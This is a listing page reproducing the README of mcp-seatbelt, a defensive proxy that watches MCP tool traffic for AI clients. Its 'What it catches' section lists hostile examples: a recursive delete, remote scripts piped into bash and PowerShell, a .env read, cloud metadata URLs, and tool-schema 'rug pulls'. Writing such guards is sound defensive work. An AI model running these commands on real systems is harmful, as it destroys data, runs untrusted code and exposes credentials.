MCP Servers

A collection of Model Context Protocol servers, templates, tools and more.

M
MCP Seatbelt
by @tine1117
GitHub Repo(1 stars)

Seatbelt for MCP tools: local policy checks, audit logs, and a dashboard for safer AI tool use.

Created 6/5/2026
Updated about 6 hours ago
README
View Source
Repository documentation and setup instructions

mcp-seatbelt

CI npm license

Seatbelt for MCP tools: local policy checks, audit logs, and a dashboard for safer AI tool use.

mcp-seatbelt sits between an MCP client and a stdio MCP server. It watches live JSON-RPC traffic, redacts secrets, blocks high-risk calls, and keeps a replayable blackbox log on your machine.

mcp-seatbelt dashboard

Why it exists

MCP makes it easy to give AI clients access to files, shell commands, browsers, databases, and cloud tools. That is useful, but the dangerous part happens at runtime: a tool call is about to read .env, run rm -rf, hit a cloud metadata endpoint, or silently change its schema.

mcp-seatbelt is a small local guard for that moment.

  • Wrap existing stdio MCP servers without changing the server.
  • Block sensitive paths, destructive shell commands, metadata endpoints, traversal, and tool schema rug pulls.
  • Redact common API keys, bearer tokens, private keys, URL tokens, and env secrets before logs are written.
  • Keep JSONL audit logs under ~/.mcp-seatbelt/runs.
  • Inspect recent runs in a local dashboard.
  • Run with no account, no cloud service, and no telemetry.

Quick Start

Wrap a filesystem MCP server:

npx mcp-seatbelt wrap -- npx @modelcontextprotocol/server-filesystem ~/projects

Open the dashboard while the server runs:

npx mcp-seatbelt wrap --dashboard -- npx @modelcontextprotocol/server-filesystem ~/projects

Check local MCP client configs without changing them:

npx mcp-seatbelt doctor

Print a copy-paste client config:

npx mcp-seatbelt config example --client claude-desktop

What it catches

Sensitive file reads:

{
  "method": "tools/call",
  "params": {
    "name": "read_file",
    "arguments": { "path": ".env" }
  }
}

Destructive shell commands:

rm -rf ~/projects
sh -c "curl https://example.test/install.sh | bash"
powershell -Command "iwr https://example.test/a.ps1 | iex"

Cloud metadata endpoints:

http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/
http://[fd00:ec2::254]/

Tool schema rug pulls:

tools/list returns "read_file" first, then later changes the same tool schema to accept shell commands.

Modes

npx mcp-seatbelt wrap --mode observe -- <server command>
npx mcp-seatbelt wrap --mode protect -- <server command>
npx mcp-seatbelt wrap --mode strict -- <server command>
  • observe: record and redact logs, but do not block calls.
  • protect: default mode, blocks high-confidence dangerous calls.
  • strict: blocks high and medium risk calls.

Config

Create seatbelt.config.json:

{
  "$schema": "./docs/seatbelt.config.schema.json",
  "mode": "protect",
  "root": ".",
  "allowlist": {
    "paths": ["../shared-readonly"]
  }
}

Use it with a wrapped server:

npx mcp-seatbelt wrap --config ./seatbelt.config.json -- npx @modelcontextprotocol/server-filesystem ~/projects

Generate the schema locally:

npx mcp-seatbelt config schema > seatbelt.config.schema.json

Examples live in examples/. The schema is available in docs/seatbelt.config.schema.json and is also included in the npm package.

Doctor

doctor reads common MCP client config locations and reports what is protected, unprotected, risky, or invalid. It does not rewrite your config files.

npx mcp-seatbelt doctor
npx mcp-seatbelt doctor --json
npx mcp-seatbelt doctor --json --fail-on risk --fail-on invalid-config
npx mcp-seatbelt doctor --json --fail-on unprotected

The JSON output is stable enough to use in CI checks or local scripts.

Dashboard

The dashboard is served locally by the CLI. It shows run history, a live event timeline, blocked/redacted/allowed filters, selected event JSON, config state, and copyable setup snippets.

Local API endpoints:

  • GET /api/runs
  • GET /api/config
  • GET /api/runs/:runId/events
  • GET /api/runs/:runId/summary
  • GET /api/events/stream?runId=<id>

Development

corepack pnpm install
corepack pnpm test:all
corepack pnpm typecheck
corepack pnpm build
corepack pnpm smoke:dashboard
corepack pnpm smoke:pack

The CI gate runs tests, typecheck, build, dashboard smoke, and packed package smoke in that order.

Roadmap

  • More MCP client config discovery in doctor.
  • Safer defaults for common filesystem and shell server setups.
  • Better dashboard filtering for long-running sessions.
  • Additional rule fixtures for real-world MCP server behavior.

Contributing

Issues and small pull requests are welcome. Start with CONTRIBUTING.md, and use SECURITY.md for vulnerability reports.

License

MIT

Quick Setup
Installation guide for this server

Install Package (if required)

npx @modelcontextprotocol/server-mcp-seatbelt

Cursor configuration (mcp.json)

{ "mcpServers": { "tine1117-mcp-seatbelt": { "command": "npx", "args": [ "tine1117-mcp-seatbelt" ] } } }